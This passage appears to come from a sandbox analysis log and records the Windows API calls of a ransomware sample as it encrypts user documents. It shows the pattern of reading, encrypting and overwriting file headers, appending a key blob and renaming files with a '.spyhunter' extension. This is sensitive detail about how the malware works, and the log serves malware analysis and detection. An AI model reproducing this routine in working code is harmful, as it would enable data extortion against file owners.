dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.104] GetProcessHeap () returned 0x2c0000 [0141.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.104] GetProcessHeap () returned 0x2c0000 [0141.104] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ebf4e0 | out: hHeap=0x2c0000) returned 1 [0141.104] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1d0 | out: pbBuffer=0x57f1d0) returned 1 [0141.104] GetProcessHeap () returned 0x2c0000 [0141.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.104] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1c8*=0x30) returned 1 [0141.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.105] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini") returned 55 [0141.105] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0141.105] GetProcessHeap () returned 0x2c0000 [0141.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.105] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f18c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f18c*=0x192, lpOverlapped=0x0) returned 1 [0141.105] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.106] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x57f18c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f18c*=0x192, lpOverlapped=0x0) returned 1 [0141.106] GetProcessHeap () returned 0x2c0000 [0141.106] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.106] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.106] WriteFile (in: hFile=0x170, lpBuffer=0x57f1cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f18c, lpOverlapped=0x0 | out: lpBuffer=0x57f1cc*, lpNumberOfBytesWritten=0x57f18c*=0x4, lpOverlapped=0x0) returned 1 [0141.106] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f18c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f18c*=0x30, lpOverlapped=0x0) returned 1 [0141.106] CloseHandle (hObject=0x170) returned 1 [0141.106] GetProcessHeap () returned 0x2c0000 [0141.106] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.106] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.spyhunter") returned 65 [0141.106] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\desktop.ini.spyhunter")) returned 1 [0141.107] GetProcessHeap () returned 0x2c0000 [0141.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.107] GetProcessHeap () returned 0x2c0000 [0141.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.107] GetProcessHeap () returned 0x2c0000 [0141.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a25b0 | out: hHeap=0x2c0000) returned 1 [0141.107] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1d0 | out: pbBuffer=0x57f1d0) returned 1 [0141.107] GetProcessHeap () returned 0x2c0000 [0141.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.107] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1c8*=0x30) returned 1 [0141.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.107] GetProcessHeap () returned 0x2c0000 [0141.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.107] GetProcessHeap () returned 0x2c0000 [0141.107] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e3b0 | out: hHeap=0x2c0000) returned 1 [0141.107] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1c8 | out: pbBuffer=0x57f1c8) returned 1 [0141.107] GetProcessHeap () returned 0x2c0000 [0141.107] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.108] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1c0*=0x30) returned 1 [0141.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.108] GetProcessHeap () returned 0x2c0000 [0141.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.108] GetProcessHeap () returned 0x2c0000 [0141.108] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e308 | out: hHeap=0x2c0000) returned 1 [0141.109] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1c0 | out: pbBuffer=0x57f1c0) returned 1 [0141.109] GetProcessHeap () returned 0x2c0000 [0141.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.109] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1b8*=0x30) returned 1 [0141.109] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.109] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini") returned 55 [0141.109] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0141.109] GetProcessHeap () returned 0x2c0000 [0141.109] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.109] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f17c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f17c*=0x11a, lpOverlapped=0x0) returned 1 [0141.110] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.110] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x57f17c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f17c*=0x11a, lpOverlapped=0x0) returned 1 [0141.110] GetProcessHeap () returned 0x2c0000 [0141.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.110] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.110] WriteFile (in: hFile=0x170, lpBuffer=0x57f1bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f17c, lpOverlapped=0x0 | out: lpBuffer=0x57f1bc*, lpNumberOfBytesWritten=0x57f17c*=0x4, lpOverlapped=0x0) returned 1 [0141.110] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f17c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f17c*=0x30, lpOverlapped=0x0) returned 1 [0141.111] CloseHandle (hObject=0x170) returned 1 [0141.111] GetProcessHeap () returned 0x2c0000 [0141.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.111] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.spyhunter") returned 65 [0141.111] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini.spyhunter")) returned 1 [0141.111] GetProcessHeap () returned 0x2c0000 [0141.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.111] GetProcessHeap () returned 0x2c0000 [0141.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.111] GetProcessHeap () returned 0x2c0000 [0141.111] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a24f8 | out: hHeap=0x2c0000) returned 1 [0141.111] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1c0 | out: pbBuffer=0x57f1c0) returned 1 [0141.111] GetProcessHeap () returned 0x2c0000 [0141.111] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.112] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1b8*=0x30) returned 1 [0141.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\.." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.112] GetProcessHeap () returned 0x2c0000 [0141.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.112] GetProcessHeap () returned 0x2c0000 [0141.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e260 | out: hHeap=0x2c0000) returned 1 [0141.112] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1b8 | out: pbBuffer=0x57f1b8) returned 1 [0141.112] GetProcessHeap () returned 0x2c0000 [0141.112] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.112] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1b0*=0x30) returned 1 [0141.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\." (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0141.112] GetProcessHeap () returned 0x2c0000 [0141.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.112] GetProcessHeap () returned 0x2c0000 [0141.112] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e1b8 | out: hHeap=0x2c0000) returned 1 [0141.113] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1b0 | out: pbBuffer=0x57f1b0) returned 1 [0141.113] GetProcessHeap () returned 0x2c0000 [0141.113] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.114] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1a8*=0x30) returned 1 [0141.114] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YEMZENSc4vdPxBsIlz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yemzensc4vdpxbsilz.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.114] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YEMZENSc4vdPxBsIlz.xls") returned 66 [0141.114] StrStrW (lpFirst="YEMZENSc4vdPxBsIlz.xls", lpSrch=".txt") returned 0x0 [0141.114] GetProcessHeap () returned 0x2c0000 [0141.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.114] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f16c*=0x2800, lpOverlapped=0x0) returned 1 [0141.115] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.115] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f16c*=0x2800, lpOverlapped=0x0) returned 1 [0141.115] GetProcessHeap () returned 0x2c0000 [0141.115] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.115] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.115] WriteFile (in: hFile=0x170, lpBuffer=0x57f1ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x57f1ac*, lpNumberOfBytesWritten=0x57f16c*=0x4, lpOverlapped=0x0) returned 1 [0141.115] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f16c*=0x30, lpOverlapped=0x0) returned 1 [0141.115] CloseHandle (hObject=0x170) returned 1 [0141.116] GetProcessHeap () returned 0x2c0000 [0141.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.116] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YEMZENSc4vdPxBsIlz.xls.spyhunter") returned 76 [0141.116] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YEMZENSc4vdPxBsIlz.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yemzensc4vdpxbsilz.xls"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\YEMZENSc4vdPxBsIlz.xls.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\yemzensc4vdpxbsilz.xls.spyhunter")) returned 1 [0141.117] GetProcessHeap () returned 0x2c0000 [0141.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.117] GetProcessHeap () returned 0x2c0000 [0141.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.117] GetProcessHeap () returned 0x2c0000 [0141.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5f78 | out: hHeap=0x2c0000) returned 1 [0141.117] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1b0 | out: pbBuffer=0x57f1b0) returned 1 [0141.117] GetProcessHeap () returned 0x2c0000 [0141.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.117] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1a8*=0x30) returned 1 [0141.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V9e39Bu.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v9e39bu.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.117] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V9e39Bu.pdf") returned 55 [0141.117] StrStrW (lpFirst="V9e39Bu.pdf", lpSrch=".txt") returned 0x0 [0141.117] GetProcessHeap () returned 0x2c0000 [0141.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.117] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f16c*=0x63f, lpOverlapped=0x0) returned 1 [0141.118] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffff9c1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.118] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x63f, lpNumberOfBytesWritten=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f16c*=0x63f, lpOverlapped=0x0) returned 1 [0141.119] GetProcessHeap () returned 0x2c0000 [0141.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.119] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.119] WriteFile (in: hFile=0x170, lpBuffer=0x57f1ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x57f1ac*, lpNumberOfBytesWritten=0x57f16c*=0x4, lpOverlapped=0x0) returned 1 [0141.119] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f16c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f16c*=0x30, lpOverlapped=0x0) returned 1 [0141.119] CloseHandle (hObject=0x170) returned 1 [0141.119] GetProcessHeap () returned 0x2c0000 [0141.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.119] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V9e39Bu.pdf.spyhunter") returned 65 [0141.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V9e39Bu.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v9e39bu.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\V9e39Bu.pdf.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\v9e39bu.pdf.spyhunter")) returned 1 [0141.120] GetProcessHeap () returned 0x2c0000 [0141.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.120] GetProcessHeap () returned 0x2c0000 [0141.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.120] GetProcessHeap () returned 0x2c0000 [0141.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2440 | out: hHeap=0x2c0000) returned 1 [0141.120] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1a8 | out: pbBuffer=0x57f1a8) returned 1 [0141.120] GetProcessHeap () returned 0x2c0000 [0141.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.120] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1a0*=0x30) returned 1 [0141.120] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SDGDUx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sdgdux.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0141.120] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SDGDUx.docx") returned 55 [0141.120] StrStrW (lpFirst="SDGDUx.docx", lpSrch=".txt") returned 0x0 [0141.120] GetProcessHeap () returned 0x2c0000 [0141.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0141.120] ReadFile (in: hFile=0x170, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57f164*=0x2800, lpOverlapped=0x0) returned 1 [0141.121] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.121] WriteFile (in: hFile=0x170, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57f164*=0x2800, lpOverlapped=0x0) returned 1 [0141.121] GetProcessHeap () returned 0x2c0000 [0141.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0141.122] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.122] WriteFile (in: hFile=0x170, lpBuffer=0x57f1a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x57f1a4*, lpNumberOfBytesWritten=0x57f164*=0x4, lpOverlapped=0x0) returned 1 [0141.122] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f164, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f164*=0x30, lpOverlapped=0x0) returned 1 [0141.122] CloseHandle (hObject=0x170) returned 1 [0141.122] GetProcessHeap () returned 0x2c0000 [0141.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0141.122] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SDGDUx.docx.spyhunter") returned 65 [0141.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SDGDUx.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sdgdux.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SDGDUx.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\sdgdux.docx.spyhunter")) returned 1 [0141.124] GetProcessHeap () returned 0x2c0000 [0141.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0141.124] GetProcessHeap () returned 0x2c0000 [0141.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.124] GetProcessHeap () returned 0x2c0000 [0141.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2388 | out: hHeap=0x2c0000) returned 1 [0141.124] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f1a8 | out: pbBuffer=0x57f1a8) returned 1 [0141.124] GetProcessHeap () returned 0x2c0000 [0141.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.124] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f1a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f1a0*=0x30) returned 1 [0141.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\SbkPC2zEPUJR1hBd.xlsx" (normalized: "c:\\users\\5p5nrgjn0js 